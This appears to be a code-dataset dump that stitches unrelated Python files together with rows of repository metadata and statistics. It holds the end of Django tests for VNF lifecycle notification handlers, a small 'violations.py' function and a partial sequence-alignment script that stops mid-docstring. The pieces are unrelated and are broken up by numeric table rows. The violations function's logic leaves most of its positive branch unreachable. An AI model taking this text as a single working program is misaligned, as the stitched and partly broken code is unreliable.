    def test_lcm_notify_view_when_change_type_is_added(self):
        """ADDED change type creates VNFC, VM, VL, Port and CP inventory rows."""
        NotifyLcm(self.vnfm_inst_id, self.m_nf_inst_id, self.data).do_biz()
        vnfc_inst = VNFCInstModel.objects.get(vnfcinstanceid="vnfc_instance_id", vduid="vdu_id", vmid="vm_id",
                                              nfinstid=self.nf_inst_id)
        self.assertIsInstance(vnfc_inst, VNFCInstModel)
        vm_inst = VmInstModel.objects.get(vmid="vm_id", vimid="vim_id", resouceid="vm_id", insttype=INST_TYPE.VNF,
                                          instid=self.nf_inst_id, vmname="vm_name", hostid='1')
        self.assertIsInstance(vm_inst, VmInstModel)
        vl_inst = VLInstModel.objects.get(vlinstanceid="vl_instance_id", vldid="vld_id", vlinstancename="resource_name",
                                          ownertype=0, ownerid=self.nf_inst_id, relatednetworkid="resource_id",
                                          vltype=0)
        self.assertIsInstance(vl_inst, VLInstModel)
        port_inst = PortInstModel.objects.get(networkid='unknown', subnetworkid='unknown', vimid="vim_id",
                                              resourceid="resource_id", name="resource_name", instid="inst_id",
                                              cpinstanceid="cp_instance_id", bandwidth='unknown',
                                              operationalstate='active', ipaddress="ip_address",
                                              macaddress='mac_address', floatipaddress='unknown',
                                              serviceipaddress='unknown', typevirtualnic='unknown',
                                              sfcencapsulation='gre', direction='unknown', tenant="tenant")
        self.assertIsInstance(port_inst, PortInstModel)
        cp_inst = CPInstModel.objects.get(cpinstanceid="cp_instance_id", cpdid="cpd_id", ownertype=0,
                                          ownerid=self.nf_inst_id, relatedtype=2, status='active')
        self.assertIsInstance(cp_inst, CPInstModel)

    def test_lcm_notify_view__when_change_type_is_added_when_nf_not_exists(self):
        """do_biz must raise when no NfInstModel row matches the notification."""
        NfInstModel.objects.all().delete()
        data = {
            "status": "START",
            "operation": "Instantiate",
            "jobId": "",
            "vnfdmodule": "",
        }
        try:
            NotifyLcm(self.vnfm_inst_id, self.m_nf_inst_id, data).do_biz()
            self.assertEqual(1, 0)  # must not be reached
        except Exception:
            self.assertEqual(1, 1)

    def test_lcm_notify_view_when_change_type_is_removeed(self):
        """REMOVED change type deletes the VNFC, VL and CP rows (the Port row remains)."""
        VNFCInstModel.objects.create(vnfcinstanceid="vnfc_instance_id")
        VLInstModel.objects.create(vlinstanceid="vl_instance_id", ownertype=0)
        CPInstModel.objects.create(cpinstanceid="cp_instance_id", cpdid="cpd_id", ownertype=0, ownerid=self.nf_inst_id,
                                   relatedtype=2, relatedport="related_port", status="active")
        data = {
            "status": "START",
            "operation": "Instantiate",
            "jobId": "",
            "vnfdmodule": "",
            "affectedVnfc": [{"vnfcInstanceId": "vnfc_instance_id",
                              "vduId": "vdu_id",
                              "changeType": VNFC_CHANGE_TYPE.REMOVED,
                              "vimId": "vim_id",
                              "vmId": "vm_id",
                              "vmName": "vm_name"
                              }],
            "affectedVl": [{"vlInstanceId": "vl_instance_id",
                            "vldId": "vld_id",
                            "changeType": VNFC_CHANGE_TYPE.REMOVED,
                            "networkResource": {
                                "resourceType": NETWORK_RESOURCE_TYPE.NETWORK,
                                "resourceId": "resource_id",
                                "resourceName": "resource_name"
                            }
                            }],
            "affectedCp": [{"changeType": VNFC_CHANGE_TYPE.REMOVED,
                            "virtualLinkInstanceId": "virtual_link_instance_id",
                            "cpInstanceId": "cp_instance_id",
                            "cpdId": "cpd_id",
                            "ownerType": 0,
                            "ownerId": "owner_id",
                            "portResource": {
                                "vimId": "vim_id",
                                "resourceId": "resource_id",
                                "resourceName": "resource_name",
                                "tenant": "tenant",
                                "ipAddress": "ip_address",
                                "macAddress": "mac_address",
                                "instId": "inst_id"
                            }
                            }],
            "affectedVirtualStorage": [{}]
        }
        NotifyLcm(self.vnfm_inst_id, self.m_nf_inst_id, data).do_biz()
        vnfc_inst = VNFCInstModel.objects.filter(vnfcinstanceid="vnfc_instance_id")
        self.assertEqual(len(vnfc_inst), 0)
        vl_inst = VLInstModel.objects.filter(vlinstanceid="vl_instance_id")
        self.assertEqual(len(vl_inst), 0)
        port_inst = PortInstModel.objects.get(networkid='unknown', subnetworkid='unknown', vimid="vim_id",
                                              resourceid="resource_id", name="resource_name", instid="inst_id",
                                              cpinstanceid="cp_instance_id", bandwidth='unknown',
                                              operationalstate='active', ipaddress="ip_address",
                                              macaddress='mac_address', floatipaddress='unknown',
                                              serviceipaddress='unknown', typevirtualnic='unknown',
                                              sfcencapsulation='gre', direction='unknown', tenant="tenant")
        self.assertIsInstance(port_inst, PortInstModel)
        cp_inst = CPInstModel.objects.filter(cpinstanceid="cp_instance_id")
        self.assertEqual(len(cp_inst), 0)

    def test_lcm_notify_view_when_change_type_is_modified(self):
        """MODIFIED change type updates pre-existing VNFC, VL, Port and CP rows in place."""
        VNFCInstModel.objects.create(vnfcinstanceid="vnfc_instance_id")
        VLInstModel.objects.create(vlinstanceid="vl_instance_id", ownertype=0)
        CPInstModel.objects.create(cpinstanceid="cp_instance_id", cpdid="cpd_id", ownertype=0, ownerid=self.nf_inst_id,
                                   relatedtype=2, relatedport="related_port")
        data = {
            "status": "START",
            "operation": "Instantiate",
            "jobId": "",
            "vnfdmodule": "",
            "affectedVnfc": [{"vnfcInstanceId": "vnfc_instance_id",
                              "vduId": "vdu_id",
                              "changeType": VNFC_CHANGE_TYPE.MODIFIED,
                              "vimId": "vim_id",
                              "vmId": "vm_id",
                              "vmName": "vm_name"
                              }],
            "affectedVl": [{"vlInstanceId": "vl_instance_id",
                            "vldId": "vld_id",
                            "changeType": VNFC_CHANGE_TYPE.MODIFIED,
                            "networkResource": {
                                "resourceType": NETWORK_RESOURCE_TYPE.NETWORK,
                                "resourceId": "resource_id",
                                "resourceName": "resource_name"
                            }
                            }],
            "affectedCp": [{"changeType": VNFC_CHANGE_TYPE.MODIFIED,
                            "virtualLinkInstanceId": "virtual_link_instance_id",
                            "cpInstanceId": "cp_instance_id",
                            "cpdId": "cpd_id",
                            "ownerType": 0,
                            "ownerId": "owner_id",
                            "portResource": {
                                "vimId": "vim_id",
                                "resourceId": "resource_id",
                                "resourceName": "resource_name",
                                "tenant": "tenant",
                                "ipAddress": "ip_address",
                                "macAddress": "mac_address",
                                "instId": "inst_id"
                            }
                            }],
            "affectedVirtualStorage": [{}]
        }
        NotifyLcm(self.vnfm_inst_id, self.m_nf_inst_id, data).do_biz()
        vnfc_inst = VNFCInstModel.objects.get(vnfcinstanceid="vnfc_instance_id", vduid="vdu_id", vmid="vm_id",
                                              nfinstid=self.nf_inst_id)
        self.assertIsInstance(vnfc_inst, VNFCInstModel)
        vl_inst = VLInstModel.objects.get(vlinstanceid="vl_instance_id", vldid="vld_id", vlinstancename="resource_name",
                                          ownertype=0, ownerid=self.nf_inst_id, relatednetworkid="resource_id",
                                          vltype=0)
        self.assertIsInstance(vl_inst, VLInstModel)
        port_inst = PortInstModel.objects.get(networkid='unknown', subnetworkid='unknown', vimid="vim_id",
                                              resourceid="resource_id", name="resource_name", instid="inst_id",
                                              cpinstanceid="cp_instance_id", bandwidth='unknown',
                                              operationalstate='active', ipaddress="ip_address",
                                              macaddress='mac_address', floatipaddress='unknown',
                                              serviceipaddress='unknown', typevirtualnic='unknown',
                                              sfcencapsulation='gre', direction='unknown', tenant="tenant")
        self.assertIsInstance(port_inst, PortInstModel)
        cp_inst = CPInstModel.objects.get(cpinstanceid="cp_instance_id", cpdid="cpd_id", ownertype=0,
                                          ownerid=self.nf_inst_id, relatedtype=2)
        self.assertIsInstance(cp_inst, CPInstModel)
class TestVnfNotifyView(TestCase):
    """Tests for the SOL003-style VNF notification handlers:
    HandleVnfLcmOocNotification and the VNF identifier creation/deletion handlers."""

    def setUp(self):
        """Create one NfInstModel row and a VnfLcmOperationOccurrenceNotification
        payload with ADDED VNFC/VL changes and one changedExtConnectivity entry."""
        self.client = Client()
        self.nf_inst_id = "test_vnf_notify"
        self.m_nf_inst_id = "test_vnf_notify_m_nf_inst_id"
        self.vnfm_inst_id = "test_vnf_notify_vnfm_inst_id"
        self.vnfd_model = {"metadata": {"vnfdId": "1"}}
        self.url = "/api/nslcm/v2/ns/%s/vnfs/%s/Notify" % (self.vnfm_inst_id, self.m_nf_inst_id)
        self.data = {
            "id": "1111",
            "notificationType": "VnfLcmOperationOccurrenceNotification",
            "subscriptionId": "1111",
            "timeStamp": "1111",
            "notificationStatus": "START",
            "operationState": "STARTING",
            "vnfInstanceId": self.nf_inst_id,
            "operation": "INSTANTIATE",
            "isAutomaticInvocation": "1111",
            "vnfLcmOpOccId": "1111",
            "affectedVnfcs": [{"id": "vnfc_instance_id",
                               "vduId": "vdu_id",
                               "changeType": VNFC_CHANGE_TYPE.ADDED,
                               "computeResource": {
                                   "vimConnectionId": "vim_connection_id",
                                   "resourceId": "resource_id"
                               }
                               }],
            "affectedVirtualLinks": [{"id": "vl_instance_id",
                                      "virtualLinkDescId": "virtual_link_desc_id",
                                      "changeType": VNFC_CHANGE_TYPE.ADDED,
                                      "networkResource": {
                                          "vimLevelResourceType": "network",
                                          "resourceId": "resource_id"
                                      }}],
            "changedExtConnectivity": [{"id": "virtual_link_instance_id",
                                        "extLinkPorts": [{"cpInstanceId": "cp_instance_id",
                                                          "id": "cpd_id",
                                                          "resourceHandle": {
                                                              "vimConnectionId": "vim_connection_id",
                                                              "resourceId": "resource_id",
                                                              "resourceProviderId": "resourceProviderId",
                                                              "tenant": "tenant",
                                                              "ipAddress": "ipAddress",
                                                              "macAddress": "macAddress",
                                                              "instId": "instId",
                                                              "networkId": "networkId",
                                                              "subnetId": "subnetId"
                                                          }
                                                          }],
                                        }]
        }
        NfInstModel.objects.all().delete()
        VNFCInstModel.objects.all().delete()
        VmInstModel.objects.all().delete()
        NfInstModel.objects.create(nfinstid=self.nf_inst_id,
                                   vnfm_inst_id=self.vnfm_inst_id,
                                   status=VNF_STATUS.NULL,
                                   mnfinstid=self.m_nf_inst_id,
                                   vnfd_model=self.vnfd_model
                                   )

    def tearDown(self):
        """Remove every inventory row the tests may have created."""
        NfInstModel.objects.all().delete()
        VNFCInstModel.objects.all().delete()
        VmInstModel.objects.all().delete()
        VLInstModel.objects.all().delete()
        PortInstModel.objects.all().delete()
        CPInstModel.objects.all().delete()

    def test_handle_vnf_lcm_ooc_notification_when_change_type_is_added(self):
        """ADDED change type creates VNFC, VM, VL, Port and CP inventory rows."""
        # response = self.client.post(self.url, data=self.data)
        HandleVnfLcmOocNotification(self.vnfm_inst_id, self.m_nf_inst_id, self.data).do_biz()
        vnfc_inst = VNFCInstModel.objects.get(vnfcinstanceid="vnfc_instance_id", vduid="vdu_id",
                                              nfinstid=self.nf_inst_id, vmid="resource_id")
        self.assertIsInstance(vnfc_inst, VNFCInstModel)
        vm_inst = VmInstModel.objects.get(vmid="resource_id", vimid="vim_connection_id", resouceid="resource_id",
                                          insttype=INST_TYPE.VNF, instid=self.nf_inst_id, vmname="resource_id",
                                          hostid='1')
        self.assertIsInstance(vm_inst, VmInstModel)
        vl_inst = VLInstModel.objects.get(vlinstanceid="vl_instance_id", vldid="virtual_link_desc_id",
                                          vlinstancename="resource_id", ownertype=0, ownerid=self.nf_inst_id,
                                          relatednetworkid="resource_id", vltype=0)
        self.assertIsInstance(vl_inst, VLInstModel)
        port_inst = PortInstModel.objects.get(networkid='networkId', subnetworkid='subnetId', vimid="vim_connection_id",
                                              resourceid="resource_id", name="resourceProviderId", instid="instId",
                                              cpinstanceid="cp_instance_id", bandwidth='unknown',
                                              operationalstate='active', ipaddress="ipAddress", macaddress='macAddress',
                                              floatipaddress='unknown', serviceipaddress='unknown',
                                              typevirtualnic='unknown', sfcencapsulation='gre', direction='unknown',
                                              tenant="tenant")
        self.assertIsInstance(port_inst, PortInstModel)
        cp_inst = CPInstModel.objects.get(cpinstanceid="cp_instance_id", cpdid="cpd_id", ownertype=0,
                                          ownerid=self.nf_inst_id, relatedtype=2, status='active')
        self.assertIsInstance(cp_inst, CPInstModel)

    def test_handle_vnf_lcm_ooc_notification_when_change_type_is_added_when_nf_not_exists(self):
        """do_biz must raise when the notification references an unknown VNF instance."""
        data = {
            "id": "1111",
            "notificationType": "VnfLcmOperationOccurrenceNotification",
            "subscriptionId": "1111",
            "timeStamp": "1111",
            "notificationStatus": "START",
            "operationState": "STARTING",
            "vnfInstanceId": "nf_not_exists",
            "operation": "INSTANTIATE",
            "isAutomaticInvocation": "1111",
            "vnfLcmOpOccId": "1111"
        }
        try:
            HandleVnfLcmOocNotification(self.vnfm_inst_id, self.m_nf_inst_id, data).do_biz()
            self.assertEqual(1, 0)  # must not be reached
        except Exception:
            self.assertEqual(1, 1)

    def test_handle_vnf_lcm_ooc_notification_when_change_type_is_removed(self):
        """REMOVED change type deletes the VNFC and VL rows."""
        VNFCInstModel.objects.create(vnfcinstanceid="vnfc_instance_id")
        VLInstModel.objects.create(vlinstanceid="vl_instance_id", ownertype=0)
        data = {
            "id": "1111",
            "notificationType": "VnfLcmOperationOccurrenceNotification",
            "subscriptionId": "1111",
            "timeStamp": "1111",
            "notificationStatus": "START",
            "operationState": "STARTING",
            "vnfInstanceId": self.nf_inst_id,
            "operation": "INSTANTIATE",
            "isAutomaticInvocation": "1111",
            "vnfLcmOpOccId": "1111",
            "affectedVnfcs": [{"id": "vnfc_instance_id",
                               "vduId": "vdu_id",
                               "changeType": VNFC_CHANGE_TYPE.REMOVED,
                               "computeResource": {
                                   "vimConnectionId": "vim_connection_id",
                                   "resourceId": "resource_id"
                               }}],
            "affectedVirtualLinks": [{"id": "vl_instance_id",
                                      "virtualLinkDescId": "virtual_link_desc_id",
                                      "changeType": VNFC_CHANGE_TYPE.REMOVED,
                                      "networkResource": {
                                          "vimLevelResourceType": "network",
                                          "resourceId": "resource_id"
                                      }}]
        }
        HandleVnfLcmOocNotification(self.vnfm_inst_id, self.m_nf_inst_id, data).do_biz()
        vnfc_inst = VNFCInstModel.objects.filter(vnfcinstanceid="vnfc_instance_id")
        self.assertEqual(len(vnfc_inst), 0)
        vl_inst = VLInstModel.objects.filter(vlinstanceid="vl_instance_id")
        self.assertEqual(len(vl_inst), 0)

    def test_handle_vnf_lcm_ooc_notification_when_change_type_is_modified(self):
        """MODIFIED change type updates pre-existing VNFC, VL, Port and CP rows in place."""
        VNFCInstModel.objects.create(vnfcinstanceid="vnfc_instance_id")
        VLInstModel.objects.create(vlinstanceid="vl_instance_id", ownertype=0)
        data = {
            "id": "1111",
            "notificationType": "VnfLcmOperationOccurrenceNotification",
            "subscriptionId": "1111",
            "timeStamp": "1111",
            "notificationStatus": "START",
            "operationState": "STARTING",
            "vnfInstanceId": self.nf_inst_id,
            "operation": "INSTANTIATE",
            "isAutomaticInvocation": "1111",
            "vnfLcmOpOccId": "1111",
            "affectedVnfcs": [{"id": "vnfc_instance_id",
                               "vduId": "vdu_id",
                               "changeType": VNFC_CHANGE_TYPE.MODIFIED,
                               "computeResource": {
                                   "vimConnectionId": "vim_connection_id",
                                   "resourceId": "resource_id"
                               }}],
            "affectedVirtualLinks": [{"id": "vl_instance_id",
                                      "virtualLinkDescId": "virtual_link_desc_id",
                                      "changeType": VNFC_CHANGE_TYPE.MODIFIED,
                                      "networkResource": {
                                          "vimLevelResourceType": "network",
                                          "resourceId": "resource_id"
                                      }}],
            "changedExtConnectivity": [{"id": "virtual_link_instance_id",
                                        "extLinkPorts": [{"cpInstanceId": "cp_instance_id",
                                                          "id": "cpd_id",
                                                          "resourceHandle": {
                                                              "vimConnectionId": "vim_connection_id",
                                                              "resourceId": "resource_id",
                                                              "resourceProviderId": "resourceProviderId",
                                                              "tenant": "tenant",
                                                              "ipAddress": "ipAddress",
                                                              "macAddress": "macAddress",
                                                              "instId": "instId",
                                                              "networkId": "networkId",
                                                              "subnetId": "subnetId"
                                                          }
                                                          }],
                                        }]
        }
        HandleVnfLcmOocNotification(self.vnfm_inst_id, self.m_nf_inst_id, data).do_biz()
        vnfc_inst = VNFCInstModel.objects.get(vnfcinstanceid="vnfc_instance_id", vduid="vdu_id",
                                              nfinstid=self.nf_inst_id, vmid="resource_id")
        self.assertIsInstance(vnfc_inst, VNFCInstModel)
        vl_inst = VLInstModel.objects.get(vlinstanceid="vl_instance_id", vldid="virtual_link_desc_id",
                                          vlinstancename="resource_id", ownertype=0, ownerid=self.nf_inst_id,
                                          relatednetworkid="resource_id", vltype=0)
        self.assertIsInstance(vl_inst, VLInstModel)
        port_inst = PortInstModel.objects.get(networkid='networkId', subnetworkid='subnetId', vimid="vim_connection_id",
                                              resourceid="resource_id", name="resourceProviderId", instid="instId",
                                              cpinstanceid="cp_instance_id", bandwidth='unknown',
                                              operationalstate='active', ipaddress="ipAddress", macaddress='macAddress',
                                              floatipaddress='unknown', serviceipaddress='unknown',
                                              typevirtualnic='unknown', sfcencapsulation='gre', direction='unknown',
                                              tenant="tenant")
        self.assertIsInstance(port_inst, PortInstModel)
        cp_inst = CPInstModel.objects.get(cpinstanceid="cp_instance_id", cpdid="cpd_id", ownertype=0,
                                          ownerid=self.nf_inst_id, relatedtype=2, status='active')
        self.assertIsInstance(cp_inst, CPInstModel)

    def test_handle_vnf_identifier_creation_notification(self):
        """Creation notification inserts an NfInstModel row with the notification timestamp."""
        vnfm_id = "vnfm_id"
        vnf_instance_id = "vnf_instance_id"
        data = {
            "timeStamp": "20190809",
        }
        HandleVnfIdentifierCreationNotification(vnfm_id, vnf_instance_id, data).do_biz()
        nf_inst = NfInstModel.objects.get(mnfinstid=vnf_instance_id, vnfm_inst_id=vnfm_id, create_time="20190809")
        self.assertIsInstance(nf_inst, NfInstModel)

    def test_handle_vnf_identifier_deletion_notification(self):
        """Deletion notification removes the matching NfInstModel row."""
        nf_inst_id = "nf_inst_id"
        vnfm_id = "vnfm_id"
        vnf_instance_id = "vnf_instance_id"
        NfInstModel.objects.create(nfinstid=nf_inst_id,
                                   vnfm_inst_id=vnfm_id,
                                   status=VNF_STATUS.NULL,
                                   mnfinstid=vnf_instance_id,
                                   vnfd_model=self.vnfd_model
                                   )
        data = {
            "timeStamp": "20190809",
        }
        HandleVnfIdentifierDeletionNotification(vnfm_id, vnf_instance_id, data).do_biz()
        nf_inst = NfInstModel.objects.filter(mnfinstid=vnf_instance_id, vnfm_inst_id=vnfm_id)
        self.assertEqual(len(nf_inst), 0)

    def test_handle_vnf_identifier_deletion_notification_when_nf_not_exists(self):
        """Deletion handler must raise when no NfInstModel row matches."""
        NfInstModel.objects.all().delete()
        vnfm_id = "nf_not_exists"
        vnf_instance_id = "nf_not_exists"
        data = {
            "timeStamp": "20190809",
        }
        try:
            HandleVnfIdentifierDeletionNotification(vnfm_id, vnf_instance_id, data).do_biz()
            self.assertEqual(1, 0)  # must not be reached
        except Exception:
            self.assertEqual(1, 1)

    @mock.patch.object(restcall, "call_req")
    def test_handle_vnf_identifier_notification_when_save_ip_aai(self, mock_call_req):
        """End-to-end: MODIFIED notification plus mocked AAI calls; the view returns 204."""
        l_interface_info_aai = {
            "interface-name": "resourceProviderId",
            "is-port-mirrored": False,
            "resource-version": "1589506153510",
            "in-maint": False,
            "is-ip-unnumbered": False
        }
        l3_interface_ipv4_address_list = {
            "l3-interface-ipv4-address": "ipAddress",
            "resource-version": "1589527363970"
        }
        # Mocked AAI responses keyed by request URL (call_req's 5th positional arg).
        mock_vals = {
            "/network/generic-vnfs/generic-vnf/%s/l-interfaces/l-interface/%s"
            % ("test_vnf_notify", "resourceProviderId"):
                [0, json.JSONEncoder().encode(l_interface_info_aai), "200"],
            "/network/generic-vnfs/generic-vnf/%s/l-interfaces/l-interface/%s/l3-interface-ipv4-address-list/%s"
            % ("test_vnf_notify", "resourceProviderId", "ipAddress"):
                [0, json.JSONEncoder().encode(l3_interface_ipv4_address_list), "200"],
            "/network/l3-networks/l3-network/%s" % "vl_instance_id":
                [0, json.JSONEncoder().encode({}), "200"],
        }

        def side_effect(*args):
            return mock_vals[args[4]]
        mock_call_req.side_effect = side_effect
        data = {
            "id": "1111",
            "notificationType": "VnfLcmOperationOccurrenceNotification",
            "subscriptionId": "1111",
            "timeStamp": "1111",
            "notificationStatus": "START",
            "operationState": "STARTING",
            "vnfInstanceId": self.nf_inst_id,
            "operation": "INSTANTIATE",
            "isAutomaticInvocation": "1111",
            "vnfLcmOpOccId": "1111",
            "affectedVnfcs": [{"id": "vnfc_instance_id",
                               "vduId": "vdu_id",
                               "changeType": VNFC_CHANGE_TYPE.MODIFIED,
                               "computeResource": {
                                   "vimConnectionId": "vim_connection_id",
                                   "resourceId": "resource_id"
                               }}],
            "affectedVirtualLinks": [{"id": "vl_instance_id",
                                      "virtualLinkDescId": "virtual_link_desc_id",
                                      "changeType": VNFC_CHANGE_TYPE.MODIFIED,
                                      "networkResource": {
                                          "vimLevelResourceType": "network",
                                          "resourceId": "resource_id"
                                      }}],
            "changedExtConnectivity": [{"id": "virtual_link_instance_id",
                                        "extLinkPorts": [{"cpInstanceId": "cp_instance_id",
                                                          "id": "cpd_id",
                                                          "resourceHandle": {
                                                              "vimConnectionId": "vim_connection_id",
                                                              "resourceId": "resource_id",
                                                              "resourceProviderId": "resourceProviderId",
                                                              "tenant": "tenant",
                                                              "ipAddress": "ipAddress",
                                                              "macAddress": "macAddress",
                                                              "instId": "instId",
                                                              "networkId": "networkId",
                                                              "subnetId": "subnetId"
                                                          }
                                                          }],
                                        "changeType": VNFC_CHANGE_TYPE.MODIFIED
                                        }]
        }
        HandleVnfLcmOocNotification(self.vnfm_inst_id, self.m_nf_inst_id, data).do_biz()
        url = '/api/nslcm/v2/ns/%s/vnfs/%s/Notify' % (self.vnfm_inst_id, self.m_nf_inst_id)
        response = self.client.post(url, data)
        self.assertEqual(status.HTTP_204_NO_CONTENT, response.status_code, response.content)
| 48.105345
| 147
| 0.536766
| 11,949
| 123,294
| 5.259687
| 0.053059
| 0.022244
| 0.046445
| 0.045157
| 0.891468
| 0.871118
| 0.855143
| 0.83939
| 0.821792
| 0.792022
| 0
| 0.022483
| 0.339116
| 123,294
| 2,562
| 148
| 48.124122
| 0.748819
| 0.017941
| 0
| 0.717784
| 0
| 0.000859
| 0.210135
| 0.071874
| 0
| 0
| 0
| 0
| 0.06744
| 1
| 0.056271
| false
| 0.002148
| 0.012887
| 0.013746
| 0.088918
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a8cace8d0a0a1acb54aa433a83484d4a44a5121b
| 614
|
py
|
Python
|
violations.py
|
rodrigo-nogues/flake8-annotations
|
b87d6e5f8750f98a53aa1b7acd58e43f1614c50d
|
[
"MIT"
] | 10
|
2020-02-10T09:37:34.000Z
|
2022-02-22T08:19:06.000Z
|
violations.py
|
rodrigo-nogues/flake8-annotations
|
b87d6e5f8750f98a53aa1b7acd58e43f1614c50d
|
[
"MIT"
] | 2
|
2020-06-14T19:51:58.000Z
|
2021-04-22T21:02:30.000Z
|
violations.py
|
rodrigo-nogues/flake8-annotations
|
b87d6e5f8750f98a53aa1b7acd58e43f1614c50d
|
[
"MIT"
] | 5
|
2020-02-10T09:37:43.000Z
|
2021-12-31T09:23:11.000Z
|
import time
def violation(ARG):
    """Return 0 for any truthy ARG; otherwise map small integers to themselves
    with fallbacks of 5 (positive) and -5 (everything else).

    Note: for non-numeric falsy arguments (e.g. None) the `ARG > 0` comparison
    raises TypeError, exactly as in the original nested-if version.
    """
    if ARG:
        return 0
    if ARG > 0:
        # Identity mapping for 1-4, default 5 for other positives.
        positives = {1: 1, 2: 2, 3: 3, 4: 4}
        return positives.get(ARG, 5)
    # Identity mapping for -1..-4, default -5 otherwise.
    negatives = {-1: -1, -2: -2, -3: -3, -4: -4}
    return negatives.get(ARG, -5)
| 21.172414
| 27
| 0.307818
| 60
| 614
| 3.15
| 0.25
| 0.222222
| 0.095238
| 0.126984
| 0.730159
| 0.730159
| 0.730159
| 0.730159
| 0.730159
| 0.730159
| 0
| 0.086207
| 0.62215
| 614
| 28
| 28
| 21.928571
| 0.728448
| 0
| 0
| 0.148148
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.037037
| false
| 0
| 0.037037
| 0
| 0.481481
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a8d49d0d1a9a99efbca571516710f0608783ee12
| 15,265
|
py
|
Python
|
Alignment_full.py
|
EclipseCN/Omics2018
|
eac75461000b265c027af73aa600e2bc97b449df
|
[
"MIT"
] | null | null | null |
Alignment_full.py
|
EclipseCN/Omics2018
|
eac75461000b265c027af73aa600e2bc97b449df
|
[
"MIT"
] | null | null | null |
Alignment_full.py
|
EclipseCN/Omics2018
|
eac75461000b265c027af73aa600e2bc97b449df
|
[
"MIT"
] | 1
|
2018-10-03T04:55:20.000Z
|
2018-10-03T04:55:20.000Z
|
# Code for sequence alignment
# Full version
def alignment(str1, str2):
    """Print and return the length of the longest common subsequence of str1 and str2.

    Bug fix: the original indexed str1 with the row counter that runs over
    len(str2), so any call with len(str1) != len(str2) raised IndexError.
    Rows now index str2 and columns index str1; for equal-length inputs the
    printed value is unchanged (LCS is symmetric). The length is also returned
    (previously only printed; callers ignoring the return are unaffected).
    """
    m = len(str1)
    n = len(str2)
    # arr[i][j] = LCS length of str2[:i] and str1[:j]; row/column 0 stay 0.
    arr = [[0] * (m + 1) for _ in range(n + 1)]
    for i in range(1, n + 1):
        for j in range(1, m + 1):
            if str2[i - 1] == str1[j - 1]:
                arr[i][j] = arr[i - 1][j - 1] + 1
            else:
                arr[i][j] = max(arr[i - 1][j], arr[i][j - 1])
    print(arr[n][m])
    return arr[n][m]
def printMat(arr):
    """Print a matrix, one row (as its list repr) per line."""
    for row in arr:
        print(row)
# Demo run: print the LCS length of two sample DNA sequences.
str1="TAGAATGCGG"
str2="TCGTAGACGA"
alignment(str1,str2)
# printMat(arr)
import numpy as np
def global_score(str1, str2):
    """Global alignment (Needleman-Wunsch style) of str1 vs str2 with gap-state
    tracking: match +1, mismatch -1, gap open -2, gap extension -1.

    Returns a tuple (score matrix as np.array, directions), where
    directions[i][j] is a list of traceback markers for that cell:
    "\\" diagonal, "|" / "—" new vertical / horizontal gap,
    "(|)" / "(—)" continued vertical / horizontal gap.
    """
    n=len(str1)
    m=len(str2)
    # arr: score matrix; gaps_i / gaps_j: whether cell (i, j) ends in a
    # vertical / horizontal gap (enables the cheaper -1 extension score).
    arr=[[None]*(m+1) for i in range(n+1)]
    gaps_i=[[False]*(m+1) for i in range(n+1)]
    gaps_j=[[False]*(m+1) for i in range(n+1)]
    directions=[[[] for j in range(m+1)] for i in range(n+1)]
    # First row/column: -2 to open the gap, then -1 per extension.
    arr[0][0]=0
    arr[0][1]=-2
    arr[1][0]=-2
    for i in range(2,m+1):
        arr[0][i]=arr[0][i-1]-1
    for i in range(2,n+1):
        arr[i][0]=arr[i-1][0]-1
    for i in range(1,n+1):
        for j in range(1,m+1):
            # Best score over: diagonal match/mismatch, gap open (-2),
            # and gap extension (-1, only if the predecessor is in a gap).
            score=-float("inf")
            if str1[i-1]==str2[j-1] and arr[i-1][j-1]+1>score:
                score=arr[i-1][j-1]+1
            if str1[i-1]!=str2[j-1] and arr[i-1][j-1]-1>score:
                score=arr[i-1][j-1]-1
            if arr[i-1][j]-2>score:
                score=arr[i-1][j]-2
            if arr[i][j-1]-2>score:
                score=arr[i][j-1]-2
            if gaps_i[i-1][j]==True and arr[i-1][j]-1>score:
                score=arr[i-1][j]-1
            if gaps_j[i][j-1]==True and arr[i][j-1]-1>score:
                score=arr[i][j-1]-1
            # Record which gap states can achieve the chosen score.
            if score==arr[i-1][j]-2:
                gaps_i[i][j]=True
            if score==arr[i][j-1]-2:
                gaps_j[i][j]=True
            if gaps_i[i-1][j]==True and arr[i-1][j]-1==score:
                gaps_i[i][j]=True
            if gaps_j[i][j-1]==True and arr[i][j-1]-1==score:
                gaps_j[i][j]=True
            # Record every traceback direction consistent with the score.
            if str1[i-1]==str2[j-1] and arr[i-1][j-1]+1==score:
                directions[i][j].append("\\")
            if str1[i-1]!=str2[j-1] and arr[i-1][j-1]-1==score:
                directions[i][j].append("\\")
            if gaps_i[i][j]==True and gaps_i[i-1][j]==True:
                directions[i][j].append("(|)")
            if gaps_j[i][j]==True and gaps_j[i][j-1]==True:
                directions[i][j].append("(—)")
            if gaps_i[i][j]==True and gaps_i[i-1][j]==False:
                directions[i][j].append("|")
            if gaps_j[i][j]==True and gaps_j[i][j-1]==False:
                directions[i][j].append("—")
            arr[i][j]=score
    return(np.array(arr),directions)
def printDirections(directions):
    """Pretty-print the traceback-direction matrix.

    Each cell's marks are concatenated and right-aligned in an
    8-character column; a blank line follows every row, and one more
    blank line ends the matrix.
    """
    for row in directions:
        rendered = "".join(
            "%8s" % "".join(str(mark) for mark in cell) for cell in row
        )
        print(rendered)
        print()
    print()
def printMat(arr):
    """Print each row of *arr* on its own line."""
    i = 0
    while i < len(arr):
        print(arr[i])
        i += 1
def printRes(i,j,directions,sequence,idx,orient,res,string="",flag_h=False,flag_v=False):
    """Recursively trace back through `directions` from cell (i, j),
    collecting every optimal global alignment rendering of `sequence`.

    i, j      : current matrix cell; the initial call uses (-1, -1),
                i.e. Python-negative indexing addresses the bottom-right.
    sequence  : the sequence being rendered; idx is its current index.
    orient    : "v" if `sequence` is the vertical (row) sequence,
